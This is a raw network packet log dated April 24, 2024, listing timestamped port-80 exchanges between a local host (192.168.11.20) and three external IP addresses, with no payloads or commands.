                                          Apr 24, 2024 11:57:22.399871111 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.399924994 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.399924994 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.399971008 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.399979115 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400033951 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400068045 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400068045 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400088072 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400114059 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400141001 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400260925 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400289059 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400289059 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400289059 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400326967 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400381088 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400414944 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400434971 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400479078 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400489092 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400531054 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400543928 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400595903 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400598049 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400645018 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400652885 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400701046 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400701046 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400708914 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400763988 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400804996 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400816917 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400852919 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400871038 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400902033 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400926113 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.400959969 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.400980949 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401009083 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401036978 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401077032 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401091099 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401129007 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401145935 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401180983 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401201010 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401230097 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401256084 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401309967 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401310921 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401360035 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401365042 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401415110 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401418924 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401463985 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401473045 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401513100 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401526928 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401571035 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401582003 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401635885 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401674986 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401689053 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401724100 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401743889 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401792049 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401798010 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401840925 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401854038 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401896000 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401910067 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.401945114 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.401964903 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402014017 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402014017 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402020931 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402076006 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402129889 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402129889 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402179003 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402184010 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402228117 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402239084 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402276993 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402293921 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402326107 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402348042 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402390003 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402403116 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:22.402440071 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402507067 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:22.402556896 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:27.092053890 CEST805031587.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:27.092427969 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:30.253801107 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:57:49.881412029 CEST5031580192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:57:58.184298038 CEST5031680192.168.11.2047.91.88.207
                                          Apr 24, 2024 11:57:58.500848055 CEST805031647.91.88.207192.168.11.20
                                          Apr 24, 2024 11:57:58.501132011 CEST5031680192.168.11.2047.91.88.207
                                          Apr 24, 2024 11:57:58.501990080 CEST5031680192.168.11.2047.91.88.207
                                          Apr 24, 2024 11:57:58.818228006 CEST805031647.91.88.207192.168.11.20
                                          Apr 24, 2024 11:57:58.838705063 CEST805031647.91.88.207192.168.11.20
                                          Apr 24, 2024 11:57:58.838718891 CEST805031647.91.88.207192.168.11.20
                                          Apr 24, 2024 11:57:58.839210987 CEST5031680192.168.11.2047.91.88.207
                                          Apr 24, 2024 11:57:58.840094090 CEST5031680192.168.11.2047.91.88.207
                                          Apr 24, 2024 11:57:59.156265020 CEST805031647.91.88.207192.168.11.20
                                          Apr 24, 2024 11:58:46.762257099 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:46.927561045 CEST8050319172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:46.927922964 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:46.928009987 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:47.093398094 CEST8050319172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:47.409538031 CEST8050319172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:47.409615040 CEST8050319172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:47.409801960 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:47.410562992 CEST8050319172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:47.410773993 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:48.431444883 CEST5031980192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:49.446960926 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:49.606822968 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:49.607187033 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:49.607287884 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:49.767097950 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.095093012 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.149728060 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.400614977 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400691986 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400753975 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400808096 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400861025 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400913954 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.400968075 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401024103 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401036978 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.401118994 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401179075 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.401190996 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401266098 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401323080 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401351929 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.401403904 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401468039 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.401478052 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401552916 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401608944 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.401719093 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.401779890 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.402282953 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.402355909 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.402412891 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.402467012 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.402650118 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.403080940 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.403153896 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.403212070 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.403268099 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.403337955 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.403418064 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.404097080 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.404189110 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.404264927 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.404321909 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.404347897 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.404540062 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.404946089 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.405020952 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.405078888 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.405133009 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.405256033 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.405308008 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:50.405862093 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.405926943 CEST8050320172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:50.406084061 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:51.118254900 CEST5032080192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.133783102 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.293715000 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.293921947 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.295301914 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.455233097 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455308914 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455358982 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455414057 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455466986 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.455493927 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455585957 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455596924 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.455674887 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455739021 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.455780983 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.455938101 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.456106901 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.615521908 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615600109 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615649939 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615705967 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.615710020 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615806103 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615861893 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.615888119 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.615967035 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616024017 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616036892 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.616111994 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616235018 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:52.616426945 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616478920 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616523981 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.616764069 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.659013987 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776221991 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776344061 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776401997 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776456118 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776508093 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:52.776799917 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.086810112 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.133472919 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400208950 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400317907 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400358915 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400397062 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400435925 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400474072 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400511980 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400531054 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400549889 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400588036 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400590897 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400629997 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400667906 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400677919 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400708914 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400865078 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400924921 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.400983095 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.400999069 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.401038885 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.401077986 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.401194096 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.401242018 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.402101040 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.402226925 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.402314901 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.402393103 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.402426958 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.402621984 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.402923107 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.402995110 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403052092 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403106928 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403256893 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.403256893 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.403671026 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403821945 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403918028 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.403980017 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.404011965 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.404267073 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.404645920 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.404715061 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.404769897 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.404824972 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.404932976 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.405102015 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.405503035 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.405570030 CEST8050321172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:53.405760050 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:53.805180073 CEST5032180192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:54.820625067 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:54.979808092 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:54.980043888 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:54.980178118 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.139219046 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.456274033 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.456300974 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.456557989 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.754383087 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754415989 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754448891 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754467010 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754492044 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754509926 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754528046 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754544020 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.754587889 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.754779100 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.754806042 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.755204916 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.755327940 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.755350113 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.755367994 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.755599022 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.756306887 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.756452084 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.756474018 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.756490946 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.756649971 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.756798983 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.757035017 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.757067919 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.757087946 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.757112026 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.757196903 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.757473946 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.757894993 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758044958 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758066893 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758177042 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758236885 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.758523941 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.758743048 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758843899 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758893967 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.758965015 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.759099007 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.759251118 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.759658098 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.759762049 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.759814024 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.759831905 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.759939909 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.760097027 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.760539055 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.760693073 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.760714054 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.760731936 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.760967970 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.761476994 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.761590958 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.761611938 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.761631012 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.761917114 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.762392044 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.762506962 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.762528896 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.762546062 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.762665987 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.762891054 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.763269901 CEST8050322172.67.152.117192.168.11.20
                                          Apr 24, 2024 11:58:55.763566971 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.763649940 CEST5032280192.168.11.20172.67.152.117
                                          Apr 24, 2024 11:58:55.922842026 CEST8050322172.67.152.117192.168.11.20
